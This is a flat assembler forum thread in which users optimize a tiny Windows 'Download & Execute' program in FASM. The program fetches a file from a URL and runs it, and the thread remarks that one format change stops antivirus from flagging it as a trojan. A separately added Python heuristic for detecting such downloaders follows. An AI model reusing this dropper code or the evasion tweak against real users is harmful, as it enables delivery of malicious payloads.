flat assembler
Message board for the users of flat assembler.
Download & Exec. (1024b)... Help to optimize.

LocoDelAssembly 24 Jul 2007, 22:13
By a simple change I got a 1024 bytes executable but I need permission of a moderator to post
sylwek32 24 Jul 2007, 22:16
Why do you need additional permission?
If you have got some technical problems maybe you can send it via PM..

LocoDelAssembly 25 Jul 2007, 00:21
Because the code looks like for hackish purposes.
Well, I PMed the minor modification now...

Yardman 25 Jul 2007, 01:41
[ Post removed by author. ]
Last edited by Yardman on 04 Apr 2012, 02:31; edited 1 time in total

LocoDelAssembly 25 Jul 2007, 02:04
I mean the possible utilization of this tiny program, not the way I stripped those 512
I did more or less the same as you Yardman. The only difference is that in the data import block I've just imported GetProcAddressA and LoadLibraryA, the rest of the original code remained intact.

Yardman 25 Jul 2007, 02:29
[ Post removed by author. ]
Last edited by Yardman on 17 Jan 2012, 17:58; edited 1 time in total

kohlrak 25 Jul 2007, 04:21
I wish I knew more about the server on it. It appears that it's not a standard HTTP server, and I have my own purpose for it... My idea could be considered a hack depending on opinion, but I don't want to mention the potential for since this is posted, it would be bad if someone saw it.

sylwek32 25 Jul 2007, 06:38
Thanks..
And yes my code looked like for hacking purposes... But I planned to use it only at home. I don't know why but if I change "format pe" to "format pe gui" my AntiVirus Software (FreeAV) shows it's a trojan horse.
LocoDelAssembly: As I start your version it shows there is no procedure like GetProcessAddressA in kernel32.dll

vador 25 Jul 2007, 08:37
GetProcessAddressA ==> GetProcAddressA
sylwek32 25 Jul 2007, 08:48
That's what I meant.. Sorry..
It shows there is no procedure in kernel32.dll like GetProcAddressA

sylwek32 26 Jul 2007, 21:19
I have made some modifications..
Would be great if you would help to optimize :wink:
Code:
;***************************************************
;* 1024-Bytes Download & Execute                   *
;***************************************************
format pe
; For some reason executable with format pe
; gui was identified as a trojan horse by
; AntiVir Guard. Format PE seems to fix that.
include 'E:\FASM\fasmw167\INCLUDE\win32ax.inc'

main:
macro loadapi api,lib {
        invoke  LoadLibrary,lib
        invoke  GetProcAddress,eax,`api
        mov     [_#api],eax
        jmp     @f
        _#api   dd 0
        @@:
}
loadapi URLDownloadToFileA,'urlmon.dll'
loadapi kernel32, 'kernel32.dll'
loadapi ShellExecuteA,'shell32.dll'
loadapi ExitProcess,'kernel32.dll'

; invoke _URLDownloadToFileA,0,flname ,localf,0,0
push 0
push 0
push strLocalfile
push strURL
push 0
call [_URLDownloadToFileA]

; invoke _ShellExecuteA, 0, optrd, localf, 0,0,SW_SHOW
push SW_SHOW
push 0
push 0
push strLocalfile
push strFunction
push 0
call [_ShellExecuteA]

; invoke _ExitProcess,0
push 0
call [_ExitProcess]
ret

strURL       db 'http://flatassembler.net/fasmw167.zip',0
strLocalfile db 'c:\fasm.zip',0
strFunction  db 'open',0

align 4
data import
        library kernel,'KERNEL32.DLL'
        import kernel,\
               LoadLibrary,'LoadLibraryA',\
               GetProcAddress,'GetProcAddress'
end data
;eof

asmfan 27 Jul 2007, 07:08
call not addresses but registers
mov esi,LoadLibrary
call [esi]
call [esi - LoadLibrary + GetProcAddress] ;call GetProcAddress
etc.
It would be cheaper to make one import table merged to code without searching addresses at all.
Replace ExitProcess with ret.
Replace absolute addressing to inc files with relative (to %fasminc%).
Don't use ['open',0] cuz ShellExecute ran with 0 as a parameter treats it as 'open'.

sylwek32 28 Jul 2007, 17:38
thanks
sylwek32 29 Jul 2007, 10:51
Some cleaned version:
Code:
;***************************************************
;* 1024-Bytes Download & Execute                   *
;***************************************************
format pe
; For some reason executable with format pe
; gui was identified as a trojan horse by
; AntiVir Guard. Format PE seems to fix that.
include '%fasminc%\win32ax.inc'

main:
;Imports moved

; invoke _URLDownloadToFileA,0,strURL ,strLocalfile,0,0
push 0
push 0
push strLocalfile
push strURL
push 0
call [URLDownloadToFileA]

; invoke _ShellExecuteA, 0, strFunction, strLocalfile, 0,0,SW_SHOW
push SW_SHOW
push 0
push 0
push strLocalfile
push 0 ;0 is open
push 0
call [ShellExecuteA]

; invoke _ExitProcess,0
push 0
call [ExitProcess]
ret

strURL       db 'http://flatassembler.net/fasmw167.zip',0
strLocalfile db 'c:\fasm.zip',0

align 4
data import
        library kernel, 'KERNEL32.DLL',\
                shell32, 'SHELL32.DLL',\
                urlmon, 'URLMON.DLL',\
                user32, 'USER32.DLL'
        import kernel,\
               LoadLibrary, 'LoadLibraryA',\
               GetProcAddress, 'GetProcAddressA',\
               ExitProcess, 'ExitProcess'
        import shell32,\
               ShellExecuteA, 'ShellExecuteA'
        import urlmon,\
               URLDownloadToFileA,'URLDownloadToFileA'
end data
;eof

sylwek32 31 Jul 2007, 14:54
New version.
Suggestions are welcome! Thanks for them.
Code:
;***************************************************
;* 1024-Bytes Download & Execute rev. 20           *
;***************************************************
format pe
; For some reason executable with format pe
; gui was identified as a trojan horse by
; AntiVir Guard. Format PE seems to fix that.
include '%fasminc%\win32ax.inc'

main:
;Imports moved

; Download strURL to strLocalfile
; invoke _URLDownloadToFileA,0,strURL ,strLocalfile,0,0
xor eax,eax
push eax
push eax
push strLocalfile
push strURL
push eax
mov esi,LoadLibrary
call DWORD [esi - LoadLibrary + URLDownloadToFileA] ;URLDownloadToFileA

; Execute Downloaded strLocalfile
; invoke _ShellExecuteA, 0, strFunction, strLocalfile, 0,0,SW_SHOW
push SW_SHOW
push eax
push eax
push strLocalfile
push eax ;eax=0 and 0 is open
push eax
call DWORD [esi - LoadLibrary + ShellExecuteA] ;ShellExecuteA

; Exit Process
push eax
call DWORD [esi - LoadLibrary + ExitProcess] ;ExitProcess
call DWORD [esi - LoadLibrary + ExitThread] ;ExitThread
ret

strURL       db 'http://flatassembler.net/fasmw167.zip',0
strLocalfile db 'c:\fasmw167.zip',0

align 4
data import
        library kernel, 'KERNEL32.DLL',\
                shell32, 'SHELL32.DLL',\
                urlmon, 'URLMON.DLL',\
                user32, 'USER32.DLL'
        import kernel,\
               LoadLibrary, 'LoadLibraryA',\
               GetProcAddress, 'GetProcAddressA',\
               ExitProcess, 'ExitProcess',\
               ExitThread, 'ExitThread'
        import shell32,\
               ShellExecuteA, 'ShellExecuteA'
        import urlmon,\
               URLDownloadToFileA,'URLDownloadToFileA'
end data
;eof

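Seen from the scanning side, the antivirus verdict mentioned in the thread has an obvious static signal: a very small PE whose imports pair a download API with a launch API. The following is an added example, not code from the thread or from any antivirus product; it walks a PE32 import table and applies that heuristic, and it also covers the first variant posted above, where the names are resolved through GetProcAddress and therefore appear only as strings. The indicator sets, the 4096-byte size threshold and all function names are assumptions made for the example.

```python
import struct

# Assumed indicator sets for this example: one "fetch" API plus one "launch" API.
FETCH = {"URLDownloadToFileA", "URLDownloadToFileW"}
LAUNCH = {"ShellExecuteA", "ShellExecuteW", "WinExec", "CreateProcessA"}

def _cstr(data, off):
    return data[off:data.index(b"\0", off)].decode("ascii", "replace")

def pe_imports(data):
    """Return {dll (lower-case): [imported names]} for a PE32 file image."""
    pe, = struct.unpack_from("<I", data, 0x3C)               # e_lfanew
    if data[:2] != b"MZ" or data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("not a PE file")
    # NumberOfSections at pe+6, SizeOfOptionalHeader at pe+20
    nsec, opt_size = struct.unpack_from("<H12xH", data, pe + 6)
    opt = pe + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 is handled")
    imp_rva, = struct.unpack_from("<I", data, opt + 96 + 8)  # data directory 1
    # Per section: VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
    secs = [struct.unpack_from("<8x4I", data, opt + opt_size + 40 * i) for i in range(nsec)]

    def off(rva):                                            # RVA -> file offset
        for vsize, va, rsize, raw in secs:
            if va <= rva < va + max(vsize, rsize):
                return rva - va + raw
        raise ValueError("RVA %#x is outside every section" % rva)

    out, desc = {}, off(imp_rva) if imp_rva else None
    while desc is not None:
        oft, _, _, name, ft = struct.unpack_from("<5I", data, desc)
        if not name:                                         # null descriptor ends the array
            break
        funcs, thunk = [], off(oft or ft)                    # OriginalFirstThunk may be 0
        while (t := struct.unpack_from("<I", data, thunk)[0]):
            funcs.append("#%d" % (t & 0xFFFF) if t >> 31 else _cstr(data, off(t) + 2))
            thunk += 4
        out.setdefault(_cstr(data, off(name)).lower(), []).extend(funcs)
        desc += 20
    return out

def api_names(data):
    names = {f for fs in pe_imports(data).values() for f in fs}
    if "GetProcAddress" in names:      # run-time lookup: names sit in the file as strings
        names |= {n for n in FETCH | LAUNCH if n.encode() in data}
    return names

def looks_like_downloader(data, max_size=4096):
    names = api_names(data)
    return len(data) <= max_size and bool(names & FETCH) and bool(names & LAUNCH)
```
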
Copyright © 1999-2024, Tomasz Grysztar.